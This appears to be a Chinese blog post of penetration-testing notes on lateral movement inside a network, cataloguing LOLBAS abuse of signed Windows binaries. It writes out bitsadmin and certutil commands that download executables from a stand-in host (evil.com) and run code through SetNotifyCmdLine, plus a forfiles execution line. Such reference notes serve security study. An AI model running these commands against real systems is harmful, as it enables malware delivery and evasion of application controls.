首页 > 其他分享 >内网测试-横向移动

内网测试-横向移动

时间:2023-12-13 18:00:59浏览次数:25  
标签:exe playfolder certutil cmd bitsadmin 横向 测试 移动 data

常见入口

• SMB 弱密码

• SqlServer 弱密码

LOLBAS,全称 Living Of The Land Binaries and Scripts (and also Libraries),是一种白利用方式,是在 2013 年 DerbyCon 由 Christopher Campbell 和 Matt Graeber 发现,最终 Philip Goh 提出的概念。 这些程序一般有有 Microsoft 或第三方认证机构的签名,但是除了可以完成正常的功能,也能够被用于内网测试中。这些程序可能会被用于:下载安全恶意程序、执行恶意代码、绕过 UAC、绕过程序控制等。

常见程序

• appsyncvpublishing.exe

– 执行 powershell

• bitsadmin.exe

– 下载文件 bitsadmin /transfer <job_name> /priority <priority> <remote_path>

<local_path>

– 下载文件 bitsadmin /create 1 bitsadmin /addfile 1 https://evil.com/autoruns.

exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete

– 复制文件 bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.

exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete

1 & bitsadmin /reset

– 代码执行 bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.

exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1

c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

• cdb.exe

• certutil.exe

– 可安装、备份、删除、管理和执行证书

– 证书存储相关功能

– 下载文件 certutil -urlcache -split -f https://addr/example.exe

– 注意 certutil 是有 cache 的,需要显式删除

– base64 编解码 certutil -encode / certutil -decode

• cmd.exe

• cmstp.exe

• control.exe

– 加载 dll

• csc.exe

– 编译 C# 载荷

• cscript.exe

– 执行脚本

• extexport.exe

• expand.exe

– 展开一个或多个压缩文件

• forfles.exe

– forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

• mofcomp.exe

• makecab.exe

• msbuild.exe

– 构建应用程序

• mshta.exe

– HTML 应用

• msiexec.exe

– 安装 msi

– 加载 dll

• msxsl.exe

– 处理 XSL 程序

• netsh.exe

• installutil.exe

– 安装/卸载程序组件


标签:exe,playfolder,certutil,cmd,bitsadmin,横向,测试,移动,data
From: https://blog.51cto.com/u_14881360/8804940

相关文章

  • 人工智能 | 如何利用ChatGPT自动生成测试用例思维导图
    思维导图是一种用图形方式表示思维和概念之间关系的工具:有些公司会使用思维导图编写测试用例,这样做的优点是:1.可视化和结构化。2.易于理解,提高效率。而ChatGPT是无法直接生成xmind格式的文件的,但是依然可以通过“曲线救国”的方式去编写思维导图格式的测试用例。实践演练那么如......
  • App测试工具记录
    使用到的工具模拟器androidstudio总体来说好用,有多个版本可选细分好,可以指定任意的android版本.坏处是有自己的网关无法使用和主机一致的网段genymotion好用,创建的手机性能高,没有上面的网段问题,但是需要注册,有账号就可以爽用.有付费内容App自动化工具appiumin......
  • 【转载】SpringBoot2.x使用Assert校验(非单元测试)
    参考https://blog.csdn.net/yangshangwei/article/details/123105926环境环境版本操作windows10JDK11Springboot2.3.12.RELEASE注意引入的包为importorg.springframework.util.Assert;介绍对象和类型断言函数说明notNull()假设对......
  • php获取详细访客信息,获取访客IP,IP归属地,访问时间,操作系统,浏览器,移动端/PC端,环境语言,访
    问题描述:需要获取访客访问网站信息1.代码示例与说明:<?phpheader("Content-Type:text/html;charset=utf-8");        //代码中涉及字符串处理,为防止汉字乱码需加编码说明functionchinesesubstr($str,$start,$len){          ......
  • 快速掌握 Websocket 接口测试|Eolink Apikit
    什么是websocket?WebSocket是HTML5下一种新的协议(websocket协议本质上是一个基于tcp的协议)。它实现了浏览器与服务器全双工通信,能更好的节省服务器资源和带宽并达到实时通讯的目的Websocket是一个持久化的协议。websocket的原理websocket约定了一个通信的规范,通过......
  • 移动CRM系统:随时掌握业务动向
     商机稍纵即逝,及时把握机会才能促成更多交易。想要在出差途中也能掌握公司运营情况?得益于移动互联网的快速发展,现在您可以利用移动CRM客户管理系统,实时管理线索,查看销售数据。本文将向您介绍,移动CRM能为企业解决哪些应用场景下的问题?1.偏远网点数据不同步在一些偏远地区或非......
  • 【APP小程序】移动安全系统&资产提取&评估扫描
    AppinfoScanner资产提取AppinfoScanner一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Do......
  • 软件测试——09
    软件维护定义:软件经过测试,交付给用户后,在使用和运行阶段中可能在运行/维护阶段对软件产品进行的修改就是维护。软件可维护性:纠正软件系统出现的错误和缺陷,以及为满足新的要求进行修改、扩充和压缩的容易程度。衡量因素:可理解性、可测试性、可修改性。占整个软件生命周期的60%-80%。......
  • 接口测试详解
    大多数人对于接口测试都觉得是一种高大上的测试,觉得学会接口测试就可以从小白测试员,变成了高级测试员,但其实接口测试只是测试的基础内容。什么是接口接口泛指实体把自己提供给外界的一种抽象化物(可以为另一实体),用以由内部操作分离出外部沟通方法,使其能被内部修改而不影响外界其他实......
  • 测试用例设计方法六脉神剑——第三剑:倚天屠龙,正交试验冲锋
    1引言上篇讲了因果图和判定表法,而这两种方法在变量值很多、排列组合数量极大的场景下,会生成非常庞大且冗余的测试用例,此时我们很难对所有组合场景进行全量测试用例覆盖,基于此短板,正交试验法应运而生。2概念及原理2.1定义正交试验法是研究多因素、多水平的一种试验法,它是利......